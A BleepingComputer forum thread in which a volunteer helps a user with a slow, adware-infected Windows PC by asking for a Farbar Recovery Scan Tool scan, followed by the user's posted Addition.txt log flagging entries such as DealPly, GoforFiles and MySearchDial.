Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple conhost exe and computer is moveing very slow


  • This topic is locked This topic is locked
35 replies to this topic

#1 dwayne12

dwayne12

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 08:51 AM

My computer is going really slow and I don't know what to do. It has mutiple conhost exe up and I can't figure it out. I downloaded Malwarebytes Anti-Malware and it's dectecting a lot of trojan clicker.



BC AdBot (Login to Remove)

 


#2 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:15 AM

Posted 28 June 2015 - 09:24 AM

Hi & :welcome: to Bleeping Computer Forums!
My name is Jürgen and I will be assisting you with your Malware related problems. :warrior:

Before we move on, please read the following points carefully: :exclame:
  • My native language isn't English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while you are follow my instructions, Stop there and tell me the exact nature of your problem.
  • If you have illegal/cracked software, cracks, keygens, etc. on the system, please remove or uninstall them now!
  • Do not run any other scans without instruction or Add/ Remove Software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
  • Post all Logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
  • If I don't hear from you within 5 days from this initial or any subsequent post, then this thread will be closed.
  • If I don't reply within 24 hours please PM me!
  • Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
Step 1

Please run a FRST scan. This will help us diagnose your problem.

frst.pngfrstscan.png
Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.

regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#3 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 10:41 AM

Additional scan result of Farbar Recovery Scan Tool (x64) Version:28-06-2015
Ran by User at 2015-06-28 11:39:45
Running from C:\Users\User\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1557550123-2840590655-2789666575-500 - Administrator - Disabled)
Guest (S-1-5-21-1557550123-2840590655-2789666575-501 - Limited - Disabled)
UpdatusUser (S-1-5-21-1557550123-2840590655-2789666575-1006 - Limited - Enabled) => C:\Users\UpdatusUser
User (S-1-5-21-1557550123-2840590655-2789666575-1000 - Administrator - Enabled) => C:\Users\User

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Ad-Aware Antivirus (Disabled - Out of date) {D87B6541-12A1-DAEA-0033-9B8057AAB996}
AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Ad-Aware Antivirus (Disabled - Out of date) {631A84A5-349B-D564-3A83-A0F22C2DF32B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}
FW: Ad-Aware Firewall (Disabled) {E040E464-58CE-DBB2-2B6C-32B5A979FEED}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AdAwareInstaller (HKLM\...\{BB6E5AA0-BBE9-4009-B94E-2801F2D67DD7}) (Version:  - )
Adobe Flash Player 17 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Application Verifier x64 External Package (Version: 8.59.29722 - Microsoft) Hidden
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6037 - AVG Technologies)
AVG 2015 (Version: 15.0.4365 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.6037 - AVG Technologies) Hidden
DealPly (HKU\.DEFAULT\...\DealPly) (Version:  - )
DealPly (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Dealply) (Version:  - )
DealPly (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dealply) (Version:  - )
DFO (HKLM-x32\...\{C1E5C0FB-527E-42C6-BCA0-0A37A6124AE4}) (Version: 1.01.0000 - Neople)
EPSON Artisan 830 Series Printer Uninstall (HKLM\...\EPSON Artisan 830 Series) (Version:  - SEIKO EPSON Corporation)
GoforFiles (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\GoforFiles) (Version: 1.9.5 - http://www.goforfiles.com/) <==== ATTENTION
GoforFiles (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\GoforFiles) (Version: 1.9.5 - http://www.goforfiles.com/) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.130 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Kits Configuration Installer (x32 Version: 8.59.25584 - Microsoft) Hidden
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5 SDK (HKLM-x32\...\{4AE57014-05C4-4864-A13D-86517A7E1BA4}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.3205.0) (Version: 4.0.3205.0 - Microsoft Corporation)
Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{F9EC30D1-F688-4708-9850-CB5120074AAA}) (Version: 4.0.3205.0 - Microsoft Corporation)
Microsoft IntelliPoint 8.1 (HKLM\...\Microsoft IntelliPoint 8.1) (Version: 8.15.406.0 - Microsoft)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 38.0.5 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 38.0.5 (x86 en-US)) (Version: 38.0.5 - Mozilla)
Nosgoth (HKLM-x32\...\Steam App 200110) (Version: 150516.109666 - Square Enix Ltd)
NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.5.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.5.44 - NVIDIA Corporation)
NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
SDK Debuggers (x32 Version: 8.59.29746 - Microsoft Corporation) Hidden
Search Protect (HKLM-x32\...\SearchProtect) (Version: 2.21.20.22 - Client Connect LTD)
SHIELD Streaming (Version: 4.1.2000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.5.44 - NVIDIA Corporation) Hidden
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version:  - )
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Unity Web Player (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Software Development Kit (HKLM-x32\...\{363a2c1e-637f-45ce-933b-5a5463efd945}) (Version: 8.59.29750 - Microsoft Corporation)
WPT Redistributables (x32 Version: 8.59.29750 - Microsoft) Hidden
WPTx64 (x32 Version: 8.59.29722 - Microsoft) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\cnvfat.dll No File <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\cnvfat.dll No File <==== ATTENTION

==================== Restore Points =========================

25-06-2015 15:50:04 Removed BlueStacks Notification Center
28-06-2015 08:26:58 Restore Operation
28-06-2015 08:49:04 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
28-06-2015 08:53:57 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
28-06-2015 08:55:49 Removed Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
28-06-2015 08:57:17 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
28-06-2015 08:59:02 Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
28-06-2015 09:01:41 Removed Visual Studio 2012 x64 Redistributables
28-06-2015 09:03:13 Removed Visual Studio 2008 x64 Redistributables
28-06-2015 09:05:57 Removed Visual Studio 2010 x64 Redistributables
28-06-2015 09:09:44 Removed Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
28-06-2015 09:12:06 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 제거
28-06-2015 09:13:23 Removed Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
28-06-2015 09:16:08 Removed Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
28-06-2015 09:27:32 Revo Uninstaller's restore point - Java 8 Update 45
28-06-2015 09:28:15 Removed Java 8 Update 45
28-06-2015 09:55:19 Revo Uninstaller's restore point - Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
28-06-2015 09:56:00 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2012-03-10 14:47 - 00000098 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1       localhost

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {009FF62F-3E2F-414D-84DB-4D9CEA4E3034} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask No Task File <==== ATTENTION
Task: {01C2294D-7EF1-466D-8438-CE409D987BBF} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {01C81EE9-52C4-4B5A-899A-8E12D307BE1E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {074D46DD-4A48-4197-82F8-E1ABCE6BA0E5} - System32\Tasks\RunOW => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe
Task: {14051FE1-3239-4F67-B79C-4D8F2A26AB3A} - System32\Tasks\{B9DAF0CE-8515-450F-AE60-24DFF1D98B1C} => pcalua.exe -a "C:\Program Files (x86)\Hi-Rez Studios\HiRezGamesDiagAndSupport.exe" -c uninstall=17
Task: {1DA4EA4B-4005-49FA-9AA1-E25C1EC56007} - System32\Tasks\{6A179C48-A0CF-4176-B2C5-6836E8A4C021} => pcalua.exe -a C:\Users\User\Downloads\dxwebsetup(1).exe -d C:\Users\User\Downloads
Task: {2EF3534B-23C1-4499-A4FE-284423208781} - System32\Tasks\{51E19296-C6F1-4D66-8031-3514E0E5DE52} => pcalua.exe -a "C:\Users\User\Desktop\OpenOffice.org 3.4.1 (en-US) Installation Files\setup.exe" -d "C:\Users\User\Desktop\OpenOffice.org 3.4.1 (en-US) Installation Files"
Task: {3D5D08CD-F268-496D-B49E-57892606D21A} - System32\Tasks\Dealply => C:\Users\User\AppData\Roaming\DealPly\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {41EE5F89-3B6F-4ED9-BB51-A9AC0B0C337C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {4D9E6DC7-B410-44CD-9036-3151471981B6} - System32\Tasks\{1E0E0D6C-0EEA-496B-BB4C-F56478BDA9C1} => pcalua.exe -a D:\install.exe -d D:\
Task: {5005B1E9-7F1F-46A0-AC23-95377E8F38F0} - System32\Tasks\{46A4EBC4-B299-4000-AA06-11085B610AF2} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{3E31400D-274E-4647-916C-2CACC3741799}\ENPSETUP.exe" -c -runfromtemp -l0x0009 -EPSON -removeonly
Task: {621416A3-CC83-4E96-81E9-88CDE8EA9632} - System32\Tasks\GoforFilesUpdate => C:\Program Files (x86)\GoforFiles\GFFUpdater.exe [2013-10-13] (http://goforfiles.com/) <==== ATTENTION
Task: {65EB9E56-B589-4D5C-9E71-2D82F1496EC6} - System32\Tasks\MySearchDial => C:\Users\User\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {68F2BF8C-D8CF-4DD3-955F-EC0499553836} - System32\Tasks\{EFDEAD54-5971-441F-844B-9AF27FA787B3} => pcalua.exe -a D:\INSTALL.EXE -d D:\
Task: {6971DD55-32E9-4D80-858C-30EF50A7AF4B} - System32\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {7439732B-D1E3-45BE-8361-B2A2BC147DA8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23] (Facebook Inc.)
Task: {83862B30-A3BB-46C8-B8A2-EECBB4BB32A5} - System32\Tasks\{1D160B88-B2D1-4015-8E02-A08A8C082F4C} => pcalua.exe -a C:\Users\User\Downloads\dxwebsetup(2).exe -d C:\Users\User\Downloads
Task: {8920B9D6-4C2F-4ECD-8C17-EC824CC2947A} - System32\Tasks\AdobeAAMUpdater-1.0-User-PC-User => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2014-02-27] (Adobe Systems Incorporated)
Task: {93536470-D3DA-4118-B359-D2B3C4A2FD27} - System32\Tasks\DealPlyUpdate => C:\Program Files (x86)\DealPly\DealPlyUpdate.exe <==== ATTENTION
Task: {994E32EC-8DFF-435C-825C-556C95600FBD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-06-04] (Adobe Systems Incorporated)
Task: {A9E1D394-2B68-44EE-8A02-6C9C80FBCDA5} - System32\Tasks\{4F2D8C26-227F-4095-BB25-E378165C2FD6} => pcalua.exe -a D:\PLAYD2.EXE -d D:\
Task: {B25342B6-B3D8-4E2D-B6E8-B46FECD99A2C} - System32\Tasks\ASUS\ASUS SIX Engine => C:\Program Files (x86)\ASUS\EPU-4 Engine\FourEngine.exe [2009-08-20] (ASUSTeK Computer Inc.)
Task: {B2E32647-C74B-4E58-95EE-5502AC559F45} - \BackgroundContainer Startup Task No Task File <==== ATTENTION
Task: {B50BED07-A5AF-4383-90C3-5BD38D5BDFF4} - System32\Tasks\{3C4A07D5-FD7E-4BFA-AC2B-4807D8053A90} => pcalua.exe -a "C:\Program Files\DomaIQ Uninstaller\DomaIQUninstall.exe"
Task: {B962029A-CD2A-4871-8D8A-B3B4AF2A389B} - System32\Tasks\{824DFE1B-C7A9-488E-953B-72581D210227} => pcalua.exe -a "D:\Adobe Pagemaker 7.0 with Serial.exe" -d D:\
Task: {BB503B1F-AA8F-408B-82BB-8C6D1E0038FD} - System32\Tasks\ParetoLogic Update Version3 => C:\Program Files (x86)\Common Files\ParetoLogic\UUS3\Pareto_Update3.exe
Task: {BE0DFCB3-37FF-4FE3-B59B-57FAB045EF21} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23] (Facebook Inc.)
Task: {C44251DE-CB33-4E58-A151-0910481AD9EE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {C46332B6-7F21-4B3E-8A65-C1E717E097E4} - System32\Tasks\ybzhzak => C:\Users\User\AppData\Local\Temp\rtjefok.exe <==== ATTENTION
Task: {C61E2429-F942-4739-9A45-46129394E0B3} - System32\Tasks\{503C0D29-248F-4AFF-8718-A3F95D837274} => pcalua.exe -a D:\WBR2310.exe -d D:\
Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector No Task File <==== ATTENTION
Task: {D4A51E57-DF4A-47EF-818E-F86679C5E970} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline No Task File <==== ATTENTION
Task: {E035411D-BE4E-4150-B486-0CA0813EBDED} - System32\Tasks\{FB038026-8BB4-48D0-871A-184689A7BBB1} => pcalua.exe -a C:\Users\User\Downloads\FTU_V32_5_10_00_5092.exe -d C:\Users\User\Downloads
Task: {E14A0A14-95A0-4510-A52F-7B3136B23DB5} - System32\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-23] (Google Inc.)
Task: {E6F8F56B-D2C7-4214-AA95-5F95475B66A9} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2011-04-13] (Microsoft Corporation)
Task: {EB4EE7CD-8D99-44E4-9E27-DAEECF2299B0} - System32\Tasks\{E3699AD5-9121-4915-B1BF-7E214006BF62} => pcalua.exe -a C:\Users\User\Downloads\FastTrackPro_6_0_2_5_10_0_5134.exe -d C:\Users\User\Downloads
Task: {EEE21153-7A10-4314-A668-F0FEAF775FF0} - System32\Tasks\{DCD4A4B9-A95D-45FA-A73D-47AE8B493E65} => pcalua.exe -a E:\SETUP.EXE -d E:\
Task: {F5E008B8-9BD7-4D6C-A61A-E0FE43C6997B} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{E1E12980-9D68-4D19-B185-76EF4D1D3E7E}.exe
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector No Task File <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{E1E12980-9D68-4D19-B185-76EF4D1D3E7E}.exe <==== ATTENTION
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core.job => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA.job => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\MySearchDial.job => C:\Users\User\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION

==================== Loaded Modules (Whitelisted) ==============

2014-12-24 18:20 - 2014-07-02 14:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-06-03 15:47 - 2014-06-03 15:47 - 00706864 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
2014-06-03 16:19 - 2014-06-03 16:19 - 00103800 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_thread-vc100-mt-1_55.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00024440 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_system-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00033656 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_chrono-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00055680 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_date_time-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00123776 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_filesystem-vc100-mt-1_55.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 10070888 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareServiceKernel.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00685904 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\SQLite.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 03393352 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\RCF.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00788856 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\boost_regex-vc100-mt-1_55.dll
2014-06-03 16:17 - 2014-06-03 16:17 - 00604520 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareActivation.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00158032 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\pugixml.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00360312 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareApplicationUpdater.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00149840 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\libssh2.dll
2014-06-03 16:19 - 2014-06-03 16:19 - 00106824 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\zlib.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00142696 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareGamingMode.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00098648 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareReset.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00120152 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTime.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00290168 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareDefinitionsUpdater.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00198024 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareDefinitionsUpdaterScheduler.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00417128 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareIgnoreList.dll
2014-06-03 16:18 - 2014-06-03 16:18 - 00245608 _____ () C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareQuarantine.dll
